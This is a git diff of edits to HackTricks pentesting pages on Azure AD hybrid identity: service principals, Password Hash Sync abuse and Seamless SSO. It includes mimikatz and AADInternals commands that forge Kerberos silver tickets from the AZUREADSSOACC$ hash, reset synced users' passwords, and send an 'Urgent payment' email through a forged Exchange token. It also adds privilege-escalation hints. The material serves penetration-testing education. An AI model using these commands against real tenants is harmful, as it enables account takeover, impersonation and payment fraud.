GITBOOK-512: change request with no subject merged in GitBook

pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md

@@ -14,16 +14,30 @@ Other ways to support HackTricks:
 
 </details>
 
-**This is a summary of the technique explained in** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)
+**This is a summary of the technique explained in** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
 
 ## Basic Information
 
 Difference between an application and a Service Principal in Azure:
 
-* **Application**: Configuration of an **application**
-* **Service Principal**: Security object that can actually have **privileges** in the Azure Directory
+* **Application/App Registrations**: Are applications that exist in your Azure AD
+  * `(Get-AzureADApplication -filter "DisplayName eq 'testapp'")`
+* **Service Principal/Enterprise Applications**: Security objects in your Azure AD that can have **privileges** in the Azure Directory and are linked to either your application or a third party application
+  * `Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")`
+  * An admin might need to approve the given permissions if they are very sensitive.
 
-The **Azure portal** calls Service Principals **"Enterprise Applications"** and **hides** most **properties** of the service principals from view.
+An application can be ruining a **Third party tenant** and once you start using it and give it access an **Enterprise Application/Service Principal is created in your tenant** to give it access to the info it needs:
+
+<figure><img src="../../../../.gitbook/assets/image (127).png" alt=""><figcaption></figcaption></figure>
+
+Applications also has 2 types of privileges which are assigned to the service principal of the application:
+
+* **Delegated permissions**: Which require signed-in user present to be used
+* **Application permissions**: Which are assigned to the application and can be used at any time
+
+<figure><img src="../../../../.gitbook/assets/image (128).png" alt=""><figcaption></figcaption></figure>
+
+Moreover, he **Azure portal** calls Service Principals **"Enterprise Applications"** and **hides** most **properties** of the service principals from view.
 
 For Office 365 and other **Microsoft applications**, the **Application** **definition** is present in one of Microsoft’s **dedicated Azure directories**.
 

pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md

@@ -114,7 +114,11 @@ Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,Obj
 Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
 ```
 
-It's also possible to dump the password of this user
+It's also possible to dump the password of this user.
+
+{% hint style="danger" %}
+Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc.
+{% endhint %}
 
 ### Seamless SSO
 
@@ -129,6 +133,7 @@ It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses.
 * [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
 * [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem\_admin/)
 * [https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf)
+* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
 
 <details>
 

pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md

@@ -1,4 +1,4 @@
-# Seamless SSO
+# Az - Seamless SSO
 
 <details>
 
@@ -24,15 +24,15 @@ Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem
 
 It's supported by both [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) and [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md).
 
-Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC** in on-prem AD. The password of the AZUREADSSOACC account is **sent as plain-text to Azure AD** during the configuration.
+Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC`$`** in on-prem AD. The password of the `AZUREADSSOACC$` account is **sent as plain-text to Azure AD** during the configuration.
 
 The **Kerberos tickets** are **encrypted** using the **NTHash (MD4)** of the password and Azure AD is using the sent password to decrypt the tickets.
 
-**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that acc**e**pts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.
+**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that accepts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.
 
 ### On-prem -> cloud
 
-The **password** of the user **AZUREADSSOACC never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**:
+The **password** of the user **`AZUREADSSOACC$` never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**:
 
 ```powershell
 # Dump hash using mimikatz
@@ -60,10 +60,10 @@ Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier
 
 # Create a silver ticket to connect to Azure with mimikatz
 Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
-mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
+mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
 
 # Create silver ticket with AADInternal to access Exchange Online
-$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "97B745CBED7B9DD6FE6C992024BC38F4"
+$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
 $at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
 ## Send email
 Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."
@@ -78,7 +78,9 @@ To use the silver ticket:
 
 <figure><img src="../../../../.gitbook/assets/image (3) (3) (1).png" alt=""><figcaption></figcaption></figure>
 
-#### And thats all! So should be in! <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
+{% hint style="success" %}
+This doesn't bypass MFA if enabled
+{% endhint %}
 
 #### ~~Creating Kerberos tickets for cloud-only users~~ <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
 
@@ -89,11 +91,20 @@ Changing SID of cloud-only admin users is now **blocked by Microsoft**.\
 For info check [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem\_admin/)
 {% endhint %}
 
+### On-prem -> Cloud via Resource Based Constrained Delegation <a href="#creating-kerberos-tickets-for-cloud-only-users" id="creating-kerberos-tickets-for-cloud-only-users"></a>
+
+Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**.
+
+<figure><img src="../../../../.gitbook/assets/image (125).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../../.gitbook/assets/image (126).png" alt=""><figcaption></figcaption></figure>
+
 ## References
 
 * [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)
 * [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem\_admin/)
+* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg)
 
 <details>